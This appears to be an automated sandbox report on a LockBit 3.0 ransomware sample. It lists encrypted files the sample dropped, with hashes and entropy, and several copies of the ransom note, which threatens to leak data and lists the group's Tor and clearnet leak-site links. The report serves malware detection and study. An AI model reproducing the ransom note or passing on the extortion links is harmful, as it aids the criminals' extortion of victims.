                Preview:_6R.. .....WL{....H.\......-...E.W.s...~(....k..~ i..j..KQ..E.M.@....!6..@..Y.r.f..+...J..0/. ...Cr.....h.....E.q.....O.x..%....@......P...)..<. J..i.c4k<.....r.k.l..P...^.s}3...whr.|1........5Wy7.e..{..%...n..$...p7.7.%!);.Jp!.s.V?....@X3..2^...u....w7.1....Z.Y5+\.cN...=.H.%?.V.Z.f.@KW."...9......E..2ZH..EPG..U...s.P.|..S.B......C.............KT... .D.......;.j..qBX........Yy.....&..1..E..%~...}.$..../....N.2......vx*..mEh;-.......eE.1.AW.......^@).....1%g..).8<.xLJ..X...\..~..B...u..Cq.bD.3w...>...N..G.)^e@)..B...........{..e.......{..-,..o_.!7.J...y.gb`.u.". .BJ..a.HD..Q..@...7..Z%.,}.Q.a.....4..k,..Z.H..t.v.!.O.#H:.\.~6=..G..... `.B*...f..D..~..he^...}O.Z._W.........p&r.y.nQ|...T....'....a.#..r..^,.6:..|..-Yku..x...[..}o.t..q...,.8;.k.o>..2.M..S.S..@,...r..|..R......9A.d(..b..w`..1.%.....wZgm...+QU......c\.....L...-.v*.....z.mZ0.GYi.K..s..Z.....Kmy...h......4..m...........NP[.*.....k....v.Gh.*..K3...|.N^C\;.3.....T...;.......Q.aqFT:.h.V.]

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):76813
                Entropy (8bit):7.997899633377345
                Encrypted:true
                SSDEEP:1536:MJpu2NAfb4AU3E/7yGQ98fSKsr2UDan/zkH+XbX:M/LNAfbnBfSKsr2UGrkerX
                MD5:09B1BA3363E78AF98FD43363FF60CC05
                SHA1:090DA6FD2380E9083F354EDD770E0BFE55703658
                SHA-256:4B6A9A79A357934C3A5EABECC58D5F6DB27E3E0E6BD4C4E39DA2CD7FC82D1CEF
                SHA-512:2CE0C4367B0677F99E3BCADAD8D21D9D58C0BA2BB5E92F4D66D410DB699F5371B5EF6BAD84E7CA34127449932B15B6453B20D17CA5606A18C84BA9CD31996886
                Malicious:true
                Preview:.:.f.L...q..G#... Lt.p..\B...4p.....c..*.&*M.4(..On..z.[8x.........np-m.:s.......".x.........4.e...u..P.O......`8.a..pNJ...\9.Q..bT..A+.{.q....7g/.a.\.L4N.u.....m.V...o.23~C"s^]p$-..x.H_R..T#Rj.l@.m.3......U....jQiH..[xR........n..M..soK....B.!.G.'l.l.B/.XG..Ou...p||.q..Q.)C..<k......MC.&.O'.4.....c.;s.....zc..#q .f6U.(0...p-.U...1@..L[...vK,$n.....a..<_...z.N..+d..8...}1..Y8...Z`.Y..#.........g.'..H.:..e....um.%.C..Zfi...../.5.Y....h@.|49..M.....Qk"i.4....p.+..]S...\`.d.k...;3...JY......=$ZS!.....$...8.)...2.T.......\...PYbt....-...~'..%...p.oV.{W..-....&:euC.u..!!kE..........-.i.qZE.s.c.Lop.q.O...l.,.....|...BWJ...:..g.3......W..C..b...+.y......N...n..}..DS.h..4.jh..R6.,.p....h.. ...aJ.0.85.:i2 ..3..A.d.W.7f.Mz..BZs....>.F.V..t.....[....l..^......D=zk.;...=cH^.9...#.o.6.0;C.su..0.......w.......o.=q.kYEq...8..Z""....-7...C.....h.3n..G..rYY.....M$1,&.&>..pC).>.^..d.s.@.......B...[...-:.AL.x.k|F...#...;.0....w..~....j....L&&.2...=-.1...h.R..L

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f0d0601b-1ca9-4fc2-a498-8f1b2c1353a6}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{fcc86364-ccd0-4b6b-bbd4-ed188fa53d71}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):111603
                Entropy (8bit):7.998526595740002
                Encrypted:true
                SSDEEP:1536:LIdcPtQecfG5N1QeNbZ6C2aOZrEhJbQwhXL9UVriCk6R4WXsMlUcE+VbKoFsvYWx:cdc1hLzN4l2QwR9GRL18Ml/EmsrEH3Gv
                MD5:949DF516CC138A22C5AF76EE526091B9
                SHA1:5EF27B2804C18016F6635FC2EAF420FF47158F71
                SHA-256:D10CD3F409F20E2D9384B4A9E4FF61BE1ADE47A91DB6E60CC109399E38B1D488
                SHA-512:F582B159141312523B9AF8083F7BDFFBEB985017DDF29FDCA952A3E079369640145CEB80EC30F46027252D7D5AE6B79D3EF247BDCBCACB7E602A447553F864EB
                Malicious:true
                Preview:+.YN!R...'......v.0.....~s......._W.~1..*.p...q.g..]....*9...Am.....#.QD.m.>T.e|'5e...s....a..u...R..........p5.....1.u...^..n.'G.....8..S1.@..Q....|C...mw.m....)..i.@..KZ.V....s.../..a_..>.v...;..r....>l.....2.BJ....W.]r(......G^.@.W.Hk.uq.S2..r.........z.p.8..>..Q..g)...9D..c5.p....y[.....U.u..7L...N...!.,1.`j..2.=..>vu .`.'......8.x.<.!9.8..j.^.O...y.D....z@N..y....i.Y.I.QC.l.l.i../....Z..}.3vK.>.....R....l7en......1#..`....B....H...<.`.An\.....[m..x...(...jrS..O^b..[..Tp?.r-/z...?[6...=s^..1.[..G.F7.q..Z...VP.(..w...."fqw............}..2Je........\.......5...lF.....X..5.A..`...O.......-)1w......E?T.S..\...W.:...[.`.....1..E..).a..9}..]..x..J.).?.WG\...{zE.!..(.....0*A.......}^..........}BPdc...=. .k.Bg....].-..I`^D6.#`*..A.s.......st......1.x(..Ea......=9i..#v.8..#.q.o.."......./..:.3.k.....@.F....fs4.."%'.s.W{=...Q\`.W..<>!hG...(^GdA...O..j.xW...b.Q._b...s...!..$...n..Y...#........$........n..R..v..X...=.Y%E...u..a..k#...j..!.B_0..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.250121996218107
                Encrypted:false
                SSDEEP:6:OF9YCKXq34ADhDCEZxXZdSmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:SOUN19ZxX2D2VJNAWnM+i+9BVzd
                MD5:63DE7E3CE6715B5A5C2F433C7F012D7A
                SHA1:D4F1CD8AA6CBDF937E23C180616B274C2F94B992
                SHA-256:259B78BB2F0B20CA7504144E3BD2E34A94A046AA2DA6745849FCCC0ACAADB7A4
                SHA-512:C13EFB98EBCD056BE074255D567726FBA70090539912245028389261CD96CC9F82E7737985FEA5BADEDD3FAD939DB73F2581E7C23784905E553889A8FCBC5E6A
                Malicious:false
                Preview:._6..^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"..u~. e.......E.....)M.G..`.pV....{b.d.....L.u...^h.9a.{.n..}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.24216796034648
                Encrypted:false
                SSDEEP:6:E+qg9YCKXq3wg18XsWf04pmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:BqgOUD18XsapD2VJNAWnM+i+9BVzd
                MD5:126450B2B1AEF59EF4D882670E8253C8
                SHA1:4E2017B0ABEC424EE17C4713F5AAA9CFFF5F743B
                SHA-256:0C51D63A8FDFD174ADF398CDB273235A138A23CC617613AB6A867752917993F8
                SHA-512:1D632488D7A6D30C0ABA952231145ABC2FE73E703B1A30F4667E0D518DF94527160B007B1E4246961B92C3F05267FC7E0714A793E255261E5561B30B63BD3CBB
                Malicious:false
                Preview:-}qj..^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"..\.....h1.......z4.D...-.Z....2........t..u...6.LS..N...?..<}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):131602
                Entropy (8bit):7.9988653720612835
                Encrypted:true
                SSDEEP:3072:v3oq80CeN7cREEmPGYzdJ2tUzOl8ORsRuCBWDrI218:v3oq8eue5fzOl9RCBIT8
                MD5:799B32FCEFD8AE126E5913A4E199E012
                SHA1:F3A9C3BD237C21067B3ECBABB3ADCE0861E657D8
                SHA-256:2C918CFC4D8A43205ABDB027005318087B7CA4C49A69E80483FBFF5AC866B719
                SHA-512:D2C9481ED63197954136F9595C52E178A3BD07DE9E83D81B18B202721F5392DFD186A7E81ACB687E6CC4FB63A2E7A5E127574CD87627CD2B4F1697F3BBD58142
                Malicious:true
                Preview:*D\.8..).,.%......&nW...'..|m..Nq.,5R...n*.d^..1......6..oT............9...j.]..zR.....rL....zFb..@.../GZ.....%. R..+....E.:..x......y..2.......Y.%Z..k.B....!..M.Y.J....P.{.^*^.~..........j.M.S..bT...[{8.1.j...@...g......K6hV.*n...B.Zl.1.qC.s...z....KU2o......P.-(.9#q.!/_1U{A.k..._....|s.".6C.er[y./.LVG@Fs.P.....(Dk?...|..........P.-.5.y..2..{at.bT3.:...hY.3..e.....J/T.U{Qn..1......C5......|.......$...Q.z.=....g.(../../z.....q.YH.[..b......c.8n.....p>Y*pCKO...~..J...q>..M.....:...P.S*]..u.>).pc=././Z..#....(..yDm.s`..:/.4 ....O-.X...V]i..w.~.zG......w7..?......G..u...-..]qh.)..HW. ..K..{..T}..=..bQ.................j.g._...R......b=...lS....MA.......x..e.=K..%.\).).\.6_>..M.L.H.sN.}x..6?.A.N@...Wm......O.....u).8..Q.OB.].}.p...h.F~..J.~w.B<7.4i.8....35...C.A$.4NHz.u_Z..Oi/'i,?....K.6.......{m.).,R.....x....-.A..jw.t,.E. .G...,(;.....QqGZ..{.\.f$...d...:.wh.}........J.\..l....lt.8I.a@:8.}.j9.....Fi.y.....f&...-[v...W.v.K@.w.o7...y.]T.#Ei..{

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):640046
                Entropy (8bit):7.791150849981481
                Encrypted:false
                SSDEEP:12288:2LKs8A7DxltTtKOTnehmauzX0AAOA+SiL5kWCvX1/zMCCVXga/UdYy9/87tvWKUB:2u4bNTneTcxAQlk3vFbMChaM9UYKU9R1
                MD5:C3FFF4785024AD54793E060FC1C95FC2
                SHA1:526677B2553A8DFE853529CA595781EA383A6960
                SHA-256:787E05789A0AE1FE27766C3C99F79FB88626BBEA08CB107DC8A091A38AC4F2AA
                SHA-512:9AA4F00B3387AD7E395D441904DED44C64322319FE9C5BC3CF7D0009AFA60AA4DE8EDA5A99BEF76307E85D5C2D98C5CE7DD62D74D149195271A7C24532A5A971
                Malicious:false
                Preview:..'....rv..S..f23&.u78.c.tE. ...;..:p...S$.jlA.I/.!3.m.,..L....IA.....m.0...{<.?k$.!_G..K2#..7E.`H.....[#.R.....B.`.. 0.d%...(}h.P......U/k..EIfla...0.p...4.....&.S.."fo3`...Lp.m|.d2..e{....>*....2..p....d...94.%.Fk.S....jL...e...=......<......d8.`..1..&N.HR.......G{.}.S.+S.........?z.ZO.7.zM....A._..|..s..|...r.}..e[C...1..W.....|.eT.f...r5.ll.....jS...$....i....R..Q..#..z..c....0Hl.d(..cVa..........>.v....&|25w.H........T.cu.D.....GY.t."a. C.*..k..d.........n.N;~.}.m...!b.QD.(..#.%P..qV.....9....hze...B.><...X......R....................Y..B.....Z....)..f_...^T..c.k4R.3%.{...._'U'..'=...j......8..TK.^zN.H....../.k.. +A>Ec..p.^..e.=,.,..G.....i.?.....gd..o.w.&@D...K....<]./...Sv&... ..E..1.#x.H...h..9...4...H.....{.-....x*..+.v..H.....\..9P.0....m.s....d@'.V..c1.X.H..@..}.x@.j....eg+....AQ-....r .w....f...g.3...Po.x-.....z."...=.{V....R,..4_UIr(.......Q`.^K.{..F`.T..s..H.B...a..".Z.|z..DN }}.2..'..t.J.,..,P....i..J,....j..D/)...2\<..5B..}

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):111603
                Entropy (8bit):7.9981336539113865
                Encrypted:true
                SSDEEP:3072:SYoY7wogYZOyYPV/f3PnBL0m7ax+EjrVhKpSP75foism0:SS7w1y/C1f3pL0NzOgPyl
                MD5:4870A6D1F294E5F3195FCB458E283B86
                SHA1:7AB618D63A49EAA303259BFBAEF751181D45E996
                SHA-256:81D869A04C8CE9FE7B090C550D7ED9F8D1098E548AB0785BA553EFF64726E5C8
                SHA-512:838B3C3F251D1D0686AD2DABBB1AC06113A1A02F7D679CABA4FFBD1977D3D4C2D3F1E105A2BEBDBC3B44622FF3A34A21D678E2425B31D0E78C72930EEC7EB6C8
                Malicious:true
                Preview:5.}.... V.z.r.....gM..-R7.w.....D...B.v...@q`."..:.}3$..kV.P.{....MNh...~..v...4.O3/+2....v.....!.\....6..D"..`....'D7.I.F...( a...5....-.....=z....4..Q{x.6....Ja@.w..BN...I)}..,..I...7..;.iY..?...<z4.w.......;2...b{..x....;..".=.3b..H=_w.>.3...;H...k...~Y..mP........'.>@Q.Y.7.A.L...}..h....W...B)....I..t....ME.X1.e ....F.._]T.......#0g.-p\x8.Y.R....2...[6.#..B...<....WI.b.q......2.-X.]..%..#...t...)f:.~..I(\..*.~.<80..^$.T+...U......!..[@.S.]O..).T...XB..c......[..:...Dwe+..X~..=J../..-..WS\:.:..L./..h.r......a!|......t...P.....TVFg........}f`*>[...g..A.q..E..XB(.......1..z...,.x..]....)..S>..h=m..e.)...H...e7.p.s....<.2...]i9.g.y&.L>..o..k..G/.l..Em/\_K.[k...O.....`..Rbh-..UI..0..C..G.%.h.z.$. ...R.A..~.....&I.[.W..P.6....ih..R..+'....Q.?...x<.Q..q...d+...jl.....L-..K..=z9... N.....Z.?"....8}Bt....[.4..d.. t.#.[...i.:.:.+.}...N....z...(.9_./....jX..J.....7i2`.q...k....dW.Z.P.1..P....y.3FrO.....v...2p_..Kg....Q...2.....nXDI5}.z...7

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.222530282145591
                Encrypted:false
                SSDEEP:6:4AF9YCKXq3Piwb4nkbdSSmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:4cOU6wbg4dbD2VJNAWnM+i+9BVzd
                MD5:37058CEEAC79266F2D73C7C356A66EBF
                SHA1:79C99697A4B656F53418C133D633AFBFE1266449
                SHA-256:DE1D5FCE2607B039E08A3A7B98A18458B31943E0CB35032733A9C8D0C77953CB
                SHA-512:4CB04D5223505F85CF89E6C54D0769E85CE9A737F2DA8F81D4637F96BDE4DF19DBE8CBCC810822AEFE1504CF49C79CA23D7B225E989588A28BB8844ECA91DB61
                Malicious:false
                Preview:..D..^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"../.8...<FBv.....;J.$...0`..J.Y...1..Q8..:.....>.P..[.,X,&...*}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.201331903334636
                Encrypted:false
                SSDEEP:6:zTzCqg9YCKXq3ZajG3Mh1ETEW100mW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:/+qgOUIQbD2VJNAWnM+i+9BVzd
                MD5:E333E66D3176625C31850B55BFCD8C66
                SHA1:347CB569F5FF263E7C9877C7CCD6977A04CD96E4
                SHA-256:9DFF85ADCFE850B40D1C0F0A974F1A9B616188680160CDB811942CB986CE079A
                SHA-512:4F20252A50FD014A9305C9262E16B85F263D7CE430660BC166039C0655E06F279FB96D4DF244F593405395CAF1A07DBC7938E95D6928C5DACC88DA98A384AB7F
                Malicious:false
                Preview:}m...^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"L...N,..-.:..d.PV....;......S...........Y..[..Kv..,z~..`3s...}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):131602
                Entropy (8bit):7.998693357920914
                Encrypted:true
                SSDEEP:3072:qgHGsk1vSHGjWTTHQVRthc6E8MUYovX44efQL7+/Acgq5mGOTP1sQ:7HGRSHGjWvwVtLDy4EOcOhTdsQ
                MD5:2699D897A18FDC54B615BFF0973A5957
                SHA1:40C615E906FA9305B134BA977F72973342FADDDD
                SHA-256:908D2CFD18165CCB715E4316AB50C33E7F661142690E7AE7EA9F0409440B04E1
                SHA-512:45BD7548624E31BF8FE408C623AE15943C1F05FE736FD7B5EB5D488068F54E7A3D523EDE8B3942851206E9FDEF0317C420D8EC46386DB7D4B1EF673359080A52
                Malicious:true
                Preview:...x...."..exJ...o...A..x#.2.-...b......I.Z^t.MK_r...i..y......(....}..4^Ohr.6.$.O..'....../......\......sI.(K.wa@.93...2....,.l.z..s.U..!...+/'.1...j`.J.....815..)i.$j..d..~!.#CA..#.....h.<.?..FH..R.RjK.\!j..YL.).={..u.n~.L.Qe....JaI...P.$....\.Kl@.&..bG..m4.\..cG/52,(.T.N:s.U.....:.3...>.+....}..*...(...J....M{#/n.._.U.}n..P.....u..Q.|...w$p..2.!=#a.q.A.w_...d.5.]....... .F..)!..u..#.[.o..|._X.e..#......6.vY>..B\M?4..WL.yf.j...x......X..Q).2A9.....h9..8..G...%..\.~o.......3..f..85m].aO.....7f..u...53...207......M.+)3.cm..1.....*eRx..'..vS......Z.K..LF....@.\W..$RRf....8.....E'..X.}FPeL;......Z....i<..k...;..GI...Uhfv..G.....7%.!...........iO..V.....c......-..l..$..i%*.4p.]<./..'.....m2..,..\.O)...eNC=>/..v..:.G'..e...B%W..4gV#.{wO.8...01H7.....a.&.;.O.... !S.m3U.6..4...hj~I.[..~=.KJ....m...t'r....T..5..j..5..$@m.....l..B...W?Q.j...X.]....d.....%..........Xu..2..c...K..+`.G7R..B..&>..t.[.E...jz.^..T...I.V.meG.^...G.U...y.F6...r.1}1...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):640046
                Entropy (8bit):7.7909802072319065
                Encrypted:false
                SSDEEP:12288:PhkkohG7LUv7o5HvDdqShuvZbdcUHWPJ+MGVvWKU9Reat2EfT:p8hGPUv7kPDdqShucf3GMKU9Rey2EfT
                MD5:2CE2444850168D938085E0E148E32E2B
                SHA1:02C2F5F0E83F7359E411DCF3B958CC8C1FEF452F
                SHA-256:CB4B526DA2436A5E391FD5649834C53796CCE2D4A12259A91E939DC43FA79BCB
                SHA-512:F2AD5D23500983DB9F786933C53CE741B1A0E7492F119705EB412D648EA3660FC70773BD69B796848F6A1A27D598F9F38C586AEEC19DE45140BE78B7920DDDF2
                Malicious:false
                Preview:...j.W..K.U..L....:.......5..J..5.^1..B.&...._....c......J7..o1..........M....-CL..R.......N.\.).r. /=.yE...y..}!.....$.`8....U....\..3.....jI..O....|.v.$..@..I@.2-..}....Bv.f.m.H..>.i&......|.y.~.we.|.p...<U.W.T.K...w........I...H....8W.....I.`J.p6g;...Uu\.H...+$.G.....'...rA.J.U.v....(.....'.*....6...V..r.Nw.8M..dC.8. .$@%.a.J.}.1....Fa.... .A...@.~=SRq....4e.....b...h.vUI.L8B._<...i>...d.3....z.^I3.1...t........[......R3..a../.d>..+`...<....Q.......(h.z...0...N,;.qyE.?........B.zb.62....*...f..a...1.P7...K.K.l.?.>.wU..{..[...|T.hC.>.|.."...2.....+~..|qu..c.)........;.{v_....4.R?w.e.'f...Gd.lT.....'. ......Q...y!.....b.I..7+..j.p..-!e..2...T@..k.<e.rb.~............\.6.....Xx..x..\.#...........pp...C.J..7W;X..Uo.x...1..6..........F..8.K;....u.A.A.B....vT;..t....wu61.../[..,...J...A..a.'......T....D.%#F..0...s...S.(_.T...'..j..r.v4.........r.....l.............^?...N..!.._....%..........g.uT......^M.]..n.I....:..r.$...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
